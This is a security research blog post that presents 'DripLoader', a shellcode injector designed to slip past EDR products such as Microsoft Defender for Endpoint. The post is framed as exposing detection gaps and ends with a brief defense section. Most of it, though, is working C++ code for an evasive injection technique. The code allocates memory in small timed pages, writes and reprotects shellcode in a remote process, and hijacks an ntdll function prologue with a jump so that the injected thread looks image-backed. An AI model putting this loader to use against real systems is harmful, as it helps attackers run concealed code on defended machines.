Bypassing EDR Real-Time Injection Detection Logic
By Filip Olszak
The blog is not about suppressing event collection, but discovering EDR architecture limitations, in the context of process injection.
Some great posts on bypassing EDR agent collection: Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR (outflank) A tale of EDR bypass methods (@s3cur3th1ssh1t) FireWalker: A New Approach to Generically Bypass User-Space EDR Hooking (mdsec) Hell's Gate (@smelly__vx, @am0nsec) Halo's Gate - twin sister of Hell's Gate (sektor7) Another method of bypassing ETW and Process Injection via ETW registration (@modexpblog) Data Only Attack: Neutralizing EtwTi Provider (@slaeryan, kernel mode)
Introduction
In the previous post we discussed how solutions that use reliable, kernel-based sources for remote memory allocation events can use these to identify many of the in-the-wild injections with relative ease, regardless of the specific technique used, and without worrying that the event source is trivial to bypass from the user-mode. Most notably Microsoft uses that ETW, though there are vendors who do it better.
Today I wanted to share how easy it is to bypass any memory allocation-based logic. We will also bypass thread initialization alerting, which combined give us a technique undetectable by MDATP and many other EDRs out there, as of today.
It is important to expose detection gaps like this, not only to force security vendors to improve defenses, but primarily to build awareness around inherent limitations of these solutions and the need for in-house security R&D programs, or at least use of well-engineered managed detection services for more complete coverage.
T1055 vs EDR
Let's first take a look at what independent evaluations can tell us about process injections, and if there is even anything to bypass.

It's definitely good to know the product you're using is not able to flag Meterpreter's migrate
command and process hollowing procedures from a 5+-year-old Carbanak malware available on GitHub, even with prior knowledge of what is going to be tested, and half a year to prepare if needed.
Other than that value of the last evaluation in the context of injections is very limited, and we are not getting the full picture of how much each vendor invests into researching TTPs relevant right now, and in the future, or how robust the detection capability and data sources really are.

While some EDRs were not able to flag on the elementary techniques, many improved detection capabilities to the point that today, it is not uncommon for process injection to be considered OPSEC-expensive by red teams. Experienced operators tend to tailor detection bypasses per-solution, and in some environments, they choose to avoid injecting altogether, as the very limited set of APIs Windows exposes for memory and thread management are under close surveillance.
We are going to talk about bypassing the mature solutions today - for the ones with T1055 misses here just use APC injection and you'll probably be fine.
Let's first discuss all the detection opportunities for anomalous remote thread creation.
CRT anomalies
The API getting the most attention has to be kernel32!CreateRemoteThread
, but we are really talking about ntdll!NtCreateThreadEx
, or the kernel-mode target intercepted through kernel callbacks.

Here we have a basic detection for a specific Windows process - msbuild.exe
creating a new thread in a remote process. Even though the criticality of a potential true positive would be quite high, after testing the rule author decided it is only suitable for low severity (probably due to FP-rate), which likely degrades the rule to an IR label/enrichment in most environments.
Such a simple detection rule is unlikely to be part of a mature EDR solution where customers expect to receive alerts for activities like this with high severity while keeping noise down to allow their analysts to review and classify the important stuff.

A more generic, custom MDATP thread creation rule-based around the new FileProfile()
enrichment function - detects extremely rare files creating threads in remote processes. Very useful to implement in-house, but still unlikely to be found in EDRs in such a simple form, as it would cause substantial amounts of false positives in certain environments, and could prove difficult to maintain.
As an example, Defender logs most remote thread creations as labeled events, but low file prevalence is not good enough of an indicator to trigger an alert, and there is more advanced logic in play - true for most decent EDRs.

Understanding correlation
By "detections" and "alerts" I do not just mean labeled activity that can be found somewhere in the platform, but rather independent pieces of logic able to signal threats with high enough fidelity to generate user-facing security incidents with no additional activity tagged on the endpoint.
(I also assume the platform is not incredibly noisy, to the level of it being unusable)
This is important to remember as EDRs use various kinds of correlation to link otherwise undetected activities to existing incidents initiated by high fidelity alerts, or generate them based on some risk score analysis often affectionately called "AI", making it difficult to judge whether some particular TTP would be detected in isolation. Some types of correlation can be very complex and difficult for adversaries to guess, but due to the high costs associated with preserving active context and using it in detection, time-based correlation plays a role in most.
On-agent detections, activity, and software inventories are often not implemented or limited in scope due to reverse engineering concerns or architecting difficulties.
We will exploit this fact later on when building our shellcode injector by introducing delays in execution as one way to avoid detection. The concept is not new and is commonly used in network attacks where IDS solutions tend to detect based on thresholds.
High fidelity alerts
So we know that even though the number of functions to monitor is limited, the volume of legitimate events poses significant challenges for high fidelity detection, and forces defenders to narrow down what constitutes "suspicious", resulting in heavy filtering or log&ignore of many collected events.
For thread creation, the most common constraint is a thread starting process
≠ hosting process
- so monitoring only remote thread creation, usually also limited to those with:
thread start in image "unbacked"
MEM_COMMIT
-type segmentthe size of segment being larger than
X
and on a scale this will still generate a very significant amount of false positives, which may lead to further filtering, for example:
thread location (
target
) only in Windows built-in executablesonly a subset of these
thread initiator (
source
) only in risky executablesunknown hashes
low file prevalence
risky paths (
%userprofile%
,%temp%
etc.)not seen on the network/on the host
memory page contains suspicious stuff
Machine learning models are often employed to attempt solving this issue, and so on - these assumptions will differ for vendors, but the idea is to tame thread creation. The less mature solutions in fact often rely on thread creation hooking/callbacks as the only source of data for injection detection.
DripLoader
DripLoader is an evasive shellcode loader (injector) for bypassing event-based injection detection, without necessarily suppressing event collection.
The project is aiming to highlight limitations of event-driven injection identification, and show the need for more advanced memory scanning and smarter local agent inventories in EDR.
DripLoader evades EDRs by
using the most risky APIs possible like
NtAllocateVirtualMemory
andNtCreateThreadEx
blending in with call arguments to create events that vendors are forced to drop or log&ignore due to volume
avoiding multi-event correlation by introducing delays
Allocating memory
To bypass any memory allocation based logic we will only commit page granularity, or PageSize
sized pages, which on Windows 10 with a modern processor is 4kB
:
this constant found in the
SYSTEM_INFO
structure tells us the lowest possible size of a VM allocationsince most legitimate remote VM operations work on a single, or a few bytes,
4kB
is by far the most prevalent allocation size (>95%), making it extremely challenging to detect on
To accomplish this we need to deal with some inconveniences
we need our shellcode in memory as a continuous byte sequence which means we cannot let
kernel32!VirtualAllocEx
choose the base, as it might reserve memory at an address where the other allocations will not fitin Windows, any new VM allocation made with
kernel32!VirtualAllocEx
and similar is rounded up toAllocationGranularity
which is another constant found inSYSTEM_INFO
and is usually64kB
for example, if we allocate
4kB
ofMEM_COMMIT | MEM_RESERVE
memory at0x40000000
, the whole0x40010000 (64kB)
region will be unavailable for new allocations
Steps we take
pre-define a list of 64-bit base addresses and
VirtualQueryEx
the target process to find the first region able to fit our shellcode blob
const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,
(void*)0x0000000010000000,
(void*)0x0000000021000000,
(void*)0x0000000032000000,
(void*)0x0000000043000000,
(void*)0x0000000050000000,
(void*)0x0000000041000000,
(void*)0x0000000042000000,
(void*)0x0000000040000000,
(void*)0x0000000022000000 };
LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)
{
MEMORY_BASIC_INFORMATION mbi;
for (auto base : VC_PREF_BASES) {
VirtualQueryEx(
hProc,
base,
&mbi,
sizeof(MEMORY_BASIC_INFORMATION)
);
if (MEM_FREE == mbi.State) {
uint64_t i;
for (i = 0; i < cVmResv; ++i) {
LPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));
VirtualQueryEx(
hProc,
currentBase,
&mbi,
sizeof(MEMORY_BASIC_INFORMATION)
);
if (MEM_FREE != mbi.State)
break;
}
if (i == cVmResv) {
// found suitable base
return base;
}
}
}
return nullptr;
}
reserve required number of full
AllocationGranularity (64kB)
sized regions, and then loop over those committing4kB
pages to ensure page alignment
// MEM_RESERVE, NO_ACCESS, 64kB
for (i = 1; i <= cVmResv; ++i)
{
// sleeps here
ANtAVM(
hProc,
¤tVmBase,
NULL,
&szVmResv,
MEM_RESERVE,
PAGE_NOACCESS
);
if (STATUS_SUCCESS == status)
vcVmResv.push_back(currentVmBase);
else
return 4;
currentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);
}
// MEM_COMMIT, PAGE_READWRITE -> PAGE_EXECUTE_READ, 4kB
for (i = 0; i < cVmResv; ++i)
{
for (cmm_i = 0; cmm_i < cVmCmm; ++cmm_i)
{
DWORD offset = (cmm_i * szVmCmm);
currentVmBase = (LPVOID)((DWORD_PTR)vcVmResv[i] + offset);
ANtAVM(
hProc,
¤tVmBase,
NULL,
&szVmCmm,
MEM_COMMIT,
PAGE_READWRITE
);
// sleeps here
SIZE_T szWritten{ 0 };
ANtWVM(
hProc,
currentVmBase,
&shellcode[offsetSc],
szVmCmm,
&szWritten
);
offsetSc += szVmCmm;
// sleeps here
ANtPVM(
hProc,
¤tVmBase,
&szVmCmm,
PAGE_EXECUTE_READ,
&oldProt
);
}
}
The pages are also written to and individually reprotected with each run to avoid a large RegionSize
of a target memory page in properties of logged VirtualProtectEx
events. (TiEtw provides this, and hooks can too).
Creating the thread
Now that we have our shellcode in the remote process we need to initiate its execution.
To do this we will use the CreateThreadEx
native API which is the ntdll target of CRT, and hence very commonly called by legitimate software. To bypass any detections we will:
create the new thread from
MEM_IMAGE
base addressmoreover, we use a known-good module loaded by the
Windows Loader
,ntdll.dll
the location will be patched with a
far jmp
to our shellcode base at the time of thread creation
Steps we take
figure out
RVA
of the function we will hijack
// ntdll.dll
char jmpModName[]{ 'n','t','d','l','l','.','d','l','l','\0' };
// RtlpWow64CtxFromAmd64
char jmpFuncName[]{ 'R','t','l','p','W','o','w','6','4','C','t','x','F','r','o','m','A','m','d','6','4','\0' };
LPVOID PrepEntry(HANDLE hProc, LPVOID vm_base)
{
unsigned char* b = (unsigned char*)&vm_base;
unsigned char jmpSc[7]{
0xB8, b[0], b[1], b[2], b[3],
0xFF, 0xE0
};
// find the export EP offset
HMODULE hJmpMod = LoadLibraryExA(
jmpModName,
NULL,
DONT_RESOLVE_DLL_REFERENCES
);
if (!hJmpMod)
return nullptr;
LPVOID lpDllExport = GetProcAddress(hJmpMod, jmpFuncName);
DWORD offsetJmpFunc = (DWORD)lpDllExport - (DWORD)hJmpMod;
[...]
}
find the base of remote
ntdll
and calculateAVA
[...]
LPVOID lpRemFuncEP{ 0 };
HMODULE hMods[1024];
DWORD cbNeeded;
char szModName[MAX_PATH];
if (EnumProcessModules(hProc, hMods, sizeof(hMods), &cbNeeded))
{
int i;
for (i = 0; i < (cbNeeded / sizeof(HMODULE)); i++)
{
if (GetModuleFileNameExA(hProc, hMods[i], szModName, sizeof(szModName) / sizeof(char)))
{
if (strcmp(PathFindFileNameA(szModName), jmpModName)==0) {
lpRemFuncEP = hMods[i];
break;
}
}
}
}
lpRemFuncEP = (LPVOID)((DWORD_PTR)lpRemFuncEP + offsetJmpFunc);
[...]
overwrite the function prologue with a
jmp
[...]
if (NULL == lpRemFuncEP)
return nullptr;
SIZE_T szWritten{ 0 };
WriteProcessMemory(
hProc,
lpDllExport,
jmpSc,
sizeof(jmpSc),
&szWritten
);
return lpDllExport;
}
CreateRemoteThread
The full source and more explanations can be found on GitHub
Result
1. The activity will generate events with the following characteristics
// reservations
VM_ALLOC:
REMOTE: 1,
SIZE: 0x10000,
TYPE: 0x2000,
PROT: 0x01 (-)
// commits
VM_ALLOC:
REMOTE: 1,
SIZE: 0x1000,
TYPE: 0x1000,
PROT: 0x04 (rw)
VM_WRITE:
REMOTE: 1,
SIZE: 0x1000
THREAD_START:
REMOTE: 1,
SUSPENDED: 0,
ACCMSK: 0xFFFF (full),
PAGE_TYPE: 0x1000000 (img),
LPTHREAD_START_ROUTINE: ntdll.RtlpWow64CtxFromAmd64+0x0
2. State of the target process (assuming shellcode does not create thread)


Defense recommendations
Option #1: Monitor injection APIs yourself
EDRs with custom rule creation (or hunting) capabilities can be used, but make sure to fully understand under what circumstances events are collected
aggregations and least frequency analysis hunting queries can be used to reduce workloads for your team
Last updated
Was this helpful?